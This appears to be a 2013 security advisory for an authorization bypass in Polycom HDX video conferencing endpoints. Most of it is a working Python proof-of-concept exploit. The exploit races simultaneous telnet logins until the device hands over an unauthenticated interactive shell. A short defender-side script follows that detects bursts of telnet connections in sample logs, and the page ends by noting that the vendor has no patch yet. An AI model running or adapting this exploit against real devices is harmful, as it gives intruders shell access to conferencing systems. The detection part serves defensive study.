Polycom HDX Video Endpoints Authorization Security Bypass Vulnerability

Release date: 2013-01-18
Updated: 2013-03-08

Affected systems:
Polycom HDX Video End Points 3.0.4
Polycom HDX Video End Points 3.0
Polycom HDX Video End Points 2.6

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57911

Polycom HDX Video Endpoints is a video conferencing system.

Polycom HDX Video Endpoints versions prior to 3.0.5 contain a security vulnerability in their implementation. An attacker can exploit it to bypass certain security restrictions and gain unauthorized access to the affected device.

<*Source: Paul Haas
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
#!/usr/bin/env python
# Paul Haas <Paul dot Haas at Security-Assessment dot com>
'''Polycom PSH Command Shell Authorization Bypass Proof of Concept
Bypass Polycom's PSH telnet login using a flaw with simultaneous
connections.'''
import sys, socket, time, threading, readline  # readline: line editing for raw_input

PORT = 23       # Default service port
THREADS = 6     # Best results vary from 4-8
BUF = 9200      # For sock.recv buffer
WAIT = 0.5      # For time.sleep between sock.send and sock.recv
SHELL = False   # Lock shell to a single thread in bypass function


def check(host, port):
    '''Check for server banner of vulnerable Polycom PSH shell'''
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.send('hello\n')
    time.sleep(WAIT)
    data = sock.recv(BUF).strip()
    sock.close()
    if 'Welcome to ViewStation' not in data:
        print "[Did not match banner information on %s:%i]: %s" % (host, port, data)
        exit(2)
    return 0


def bypass(host, port):
    '''Loop socket connection until login prompt is bypassed'''
    global SHELL
    while not SHELL:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host, port))
        sock.send('whoami\n')
        data = sock.recv(BUF)
        while data:
            if SHELL:
                # Another thread already holds the shell; give up this connection
                break
            elif 'Polycom' in data:
                SHELL = True
                print "[Bypass attack succeeded, spawning interactive shell]:"
                while data:
                    print data.strip()
                    echo = raw_input("-> ")
                    try:
                        sock.send("%s\n" % echo)
                    except socket.error:
                        break
                    time.sleep(WAIT)
                    data = sock.recv(BUF)
                print "[Connection closed]"
            elif 'bind' in data:
                # Device reported a "Socket bind error"; retry on the same connection
                print data.strip()
                sock.send('whoami\n')
            elif 'failed' in data:
                break
            data = sock.recv(BUF)
        sock.close()
    return 0


if __name__ == '__main__':
    if len(sys.argv) <= 1:
        print __doc__
        print "Usage: %s [HOST] {PORT=%i} {THREADS=%s}" % (sys.argv[0], PORT, THREADS)
        exit(1)
    host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
    port = int(sys.argv[2]) if len(sys.argv) > 2 else PORT
    threads = int(sys.argv[3]) if len(sys.argv) > 3 else THREADS
    check(host, port)
    print "[Running attack against %s:%i using %i threads]" % (host, port, threads)
    print "[Look for 'Socket bind error' messages, bypass may take time]"
    for i in range(threads):
        thread = threading.Thread(target=bypass, args=(host, port,))
        thread.start()
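As an added defender-side example (not part of the advisory or of the PoC author's code), the following flags the network pattern the script above produces: many near-simultaneous telnet (TCP/23) connections from one source to one endpoint, found in constructed connection-log lines. The log format, window, threshold and addresses are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample connection-log lines (not real device or firewall output):
# one source opening several telnet (TCP/23) sessions per second to one endpoint.
SAMPLE_LOG = """\
2013-02-12T10:00:00 src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:00:00 src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:00:01 src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:00:01 src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:00:02 src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:00:02 src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:00:03 src=10.0.0.7 dst=10.0.0.20 dport=23 proto=tcp
2013-02-12T10:05:00 src=10.0.0.9 dst=10.0.0.20 dport=443 proto=tcp
"""

def parse_line(line):
    """Parse 'timestamp key=value ...' into (datetime, dict of fields)."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), fields

def find_telnet_bursts(log_text, window=timedelta(seconds=5), threshold=4):
    """Return [(src, dst, peak)]: sources that opened at least `threshold`
    TCP/23 connections to one destination inside any `window`."""
    times_by_pair = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, f = parse_line(line)
        if f.get("proto") == "tcp" and f.get("dport") == "23":
            times_by_pair[(f["src"], f["dst"])].append(ts)
    alerts = []
    for (src, dst), times in times_by_pair.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((src, dst, peak))
    return alerts

if __name__ == "__main__":
    for src, dst, peak in find_telnet_bursts(SAMPLE_LOG):
        print("telnet connection burst: %s -> %s (%d in window)" % (src, dst, peak))
```

A single operator session is one connection, so a threshold of a few connections per few seconds from one source separates normal use from the threaded reconnect loop.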

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Polycom
-------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:

http://www.polycom.com